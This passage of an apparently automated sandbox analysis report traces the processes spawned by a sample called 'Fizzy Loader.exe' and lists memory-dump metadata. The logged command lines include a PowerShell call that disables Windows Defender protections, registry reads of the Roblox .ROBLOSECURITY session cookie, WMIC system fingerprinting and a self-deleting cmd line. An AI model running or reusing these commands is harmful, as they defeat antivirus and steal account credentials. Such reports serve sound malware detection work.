                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:7
                                                                                                                                                          Start time:18:49:54
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:8
                                                                                                                                                          Start time:18:49:57
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                          Imagebase:0x7ff6ef0c0000
                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:9
                                                                                                                                                          Start time:18:50:01
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:10
                                                                                                                                                          Start time:18:50:01
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:18:50:04
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:18:50:04
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:14
                                                                                                                                                          Start time:18:50:12
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:15
                                                                                                                                                          Start time:18:50:12
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:16
                                                                                                                                                          Start time:18:50:27
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"wmic.exe" os get Caption
                                                                                                                                                          Imagebase:0x7ff61d3e0000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:17
                                                                                                                                                          Start time:18:50:27
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:18
                                                                                                                                                          Start time:18:50:28
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                          Imagebase:0x7ff61d3e0000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:19
                                                                                                                                                          Start time:18:50:28
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:20
                                                                                                                                                          Start time:18:50:28
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"wmic.exe" csproduct get uuid
                                                                                                                                                          Imagebase:0x7ff61d3e0000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:21
                                                                                                                                                          Start time:18:50:28
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:22
                                                                                                                                                          Start time:18:50:29
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:23
                                                                                                                                                          Start time:18:50:29
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:25
                                                                                                                                                          Start time:18:50:48
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"wmic" path win32_VideoController get name
                                                                                                                                                          Imagebase:0x7ff61d3e0000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:26
                                                                                                                                                          Start time:18:50:48
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:27
                                                                                                                                                          Start time:18:50:52
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause
                                                                                                                                                          Imagebase:0x7ff641e80000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:28
                                                                                                                                                          Start time:18:50:52
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:29
                                                                                                                                                          Start time:18:50:52
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\PING.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:ping localhost
                                                                                                                                                          Imagebase:0x7ff752ab0000
                                                                                                                                                          File size:22'528 bytes
                                                                                                                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true


                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:15.1%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                            Signature Coverage:100%
                                                                                                                                                            Total number of Nodes:4
                                                                                                                                                            Total number of Limit Nodes:0
                                                                                                                                                            execution_graph 47936 7ff8491036ae 47937 7ff8491036ca 47936->47937 47938 7ff8491037c7 CryptUnprotectData 47937->47938 47939 7ff849103843 47938->47939

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (H$0H$0H$8H
                                                                                                                                                            • API String ID: 0-3080014465
                                                                                                                                                            • Opcode ID: d1bd4c763b213f4121c7c332e27e6407caca0c17bfaca6963c73670ff3135ef6
                                                                                                                                                            • Instruction ID: ca504a8b140c7f620ff97b165b65c4cbc0f3fc0bb82d23e2fc884339b07df6b4
                                                                                                                                                            • Opcode Fuzzy Hash: d1bd4c763b213f4121c7c332e27e6407caca0c17bfaca6963c73670ff3135ef6
                                                                                                                                                            • Instruction Fuzzy Hash: 8702D431E1D9599FE7A8FF2C945A6B877E1FF98354F0401BAD04DC7292EE2CA8418B41

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (H$0H$0H$8H
                                                                                                                                                            • API String ID: 0-3080014465
                                                                                                                                                            • Opcode ID: 9ba2becd397036aa436a46448a73fc2526ed1b746548803eef7144b142f31a33
                                                                                                                                                            • Instruction ID: 341d3f003a9faae5ea7f9ac604ae3de4b1a44f1ee58039a5057a62fc66cd7895
                                                                                                                                                            • Opcode Fuzzy Hash: 9ba2becd397036aa436a46448a73fc2526ed1b746548803eef7144b142f31a33
                                                                                                                                                            • Instruction Fuzzy Hash: 22D1D331F1D9699FE7A4FB2CA8556F877E1FF88364F04017AD04DC7292DE28A8418B85

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (H$0H$0H$8H
                                                                                                                                                            • API String ID: 0-3080014465
                                                                                                                                                            • Opcode ID: 7d7bec87e2100594f033bd17f50fe3edfaa7b98fa1fe61451c583969bd574ee7
                                                                                                                                                            • Instruction ID: 03a0e543cfffa1da9dd5af235c15a8408459d469adcc5b4fb37f796283a91354
                                                                                                                                                            • Opcode Fuzzy Hash: 7d7bec87e2100594f033bd17f50fe3edfaa7b98fa1fe61451c583969bd574ee7
                                                                                                                                                            • Instruction Fuzzy Hash: 4FC1C231F1C9599FE7A4EF2C985A6F977E1FF98350F0401BAD04DC7292DE28A8418B81

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (H$0H$0H$8H
                                                                                                                                                            • API String ID: 0-3080014465
                                                                                                                                                            • Opcode ID: a9189f649a9e4ab096c07d3d2deff4ee5abb4673ad4e54486356d69bc659de37
                                                                                                                                                            • Instruction ID: 84e096d377c70a60c15b15d9f4a90b4f9d3605f8986e30897a50dee0e4789797
                                                                                                                                                            • Opcode Fuzzy Hash: a9189f649a9e4ab096c07d3d2deff4ee5abb4673ad4e54486356d69bc659de37
                                                                                                                                                            • Instruction Fuzzy Hash: 03C1C331F1C9599FE7A8FB2C985A6F977E1FF98350F04017AD04DC7292DE28A8418B81

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: +$BR_H$m
                                                                                                                                                            • API String ID: 0-3582178533
                                                                                                                                                            • Opcode ID: 9d062e40978b4e174af688c42b711a3a3f493e7c5bf5c9564125e97d7c2229ad
                                                                                                                                                            • Instruction ID: 8d42b18c7105b615879be04c5cd433085b7bcbb815d1202f4ab2f451f978a081
                                                                                                                                                            • Opcode Fuzzy Hash: 9d062e40978b4e174af688c42b711a3a3f493e7c5bf5c9564125e97d7c2229ad
                                                                                                                                                            • Instruction Fuzzy Hash: 6B829AB0E18A499FE799EB18D8547A9B7E1FF98358F1001BDE14DD32C2CF3859818B06
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: A
                                                                                                                                                            • API String ID: 0-3554254475
                                                                                                                                                            • Opcode ID: a6e398af9b1d4b30ad725e857be10011606535c7068e0af78a41d61c598aed6c
                                                                                                                                                            • Instruction ID: 77e059058ffadc0a2169fb4cbe95708b3d11daf37ea2043ff20ce88f48299977
                                                                                                                                                            • Opcode Fuzzy Hash: a6e398af9b1d4b30ad725e857be10011606535c7068e0af78a41d61c598aed6c
                                                                                                                                                            • Instruction Fuzzy Hash: D823F57091D7C58FD33A9F2484426A67BE0FF96344F1445FEC48E8B593EA3A6406CB92
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: r
                                                                                                                                                            • API String ID: 0-1812594589
                                                                                                                                                            • Opcode ID: ef3986066dcbee7e9889083e71fa4b1edd1e7a4d6c30ad015ed7496e06acbd1f
                                                                                                                                                            • Instruction ID: fd4915e027f07da87a4d7605841016ee06f16347edf090b23c3ae05e7491cb6d
                                                                                                                                                            • Opcode Fuzzy Hash: ef3986066dcbee7e9889083e71fa4b1edd1e7a4d6c30ad015ed7496e06acbd1f
                                                                                                                                                            • Instruction Fuzzy Hash: 8CD21271A0DA865FE75DEB28945A6747BE1EF5A384B0400FEC04ADB2E3ED2D6C05CB41
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HG_H$xI
                                                                                                                                                            • API String ID: 0-663151228
                                                                                                                                                            • Opcode ID: 229d6d945da2dd7b2e547dd680e737ea775bb278100bec1c47ebb2cf21949731
                                                                                                                                                            • Instruction ID: aeccdadec47a3b4c3abe23655c18ec3c0a75e2ebce56cbabc53756776953344a
                                                                                                                                                            • Opcode Fuzzy Hash: 229d6d945da2dd7b2e547dd680e737ea775bb278100bec1c47ebb2cf21949731
                                                                                                                                                            • Instruction Fuzzy Hash: DC12A370A1CB864FE7B8EB189459A7AB7D1FF95350F10467EC48DC3292DF34A8428786
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: n/_H
                                                                                                                                                            • API String ID: 0-2357778120
                                                                                                                                                            • Opcode ID: fe3afe4c50397c72c15ec13e8e101059a659823523c3e79ce4d5633763ad3fe1
                                                                                                                                                            • Instruction ID: dce7ae7298f90333964d3f9ba98e2117eaa512061b2a6b35043fb14f3eaf5086
                                                                                                                                                            • Opcode Fuzzy Hash: fe3afe4c50397c72c15ec13e8e101059a659823523c3e79ce4d5633763ad3fe1
                                                                                                                                                            • Instruction Fuzzy Hash: E4D2293090EAC94FDB69EF688815AA97BE1FF4A344F0401FED04DDB293DE296845CB51
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: H
                                                                                                                                                            • API String ID: 0-2852464175
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: xKI
                                                                                                                                                            • API String ID: 0-1236185655
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: _
                                                                                                                                                            • API String ID: 0-701932520
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: aH
                                                                                                                                                            • API String ID: 0-2191227055
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 834300711-0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Memory Dump Source
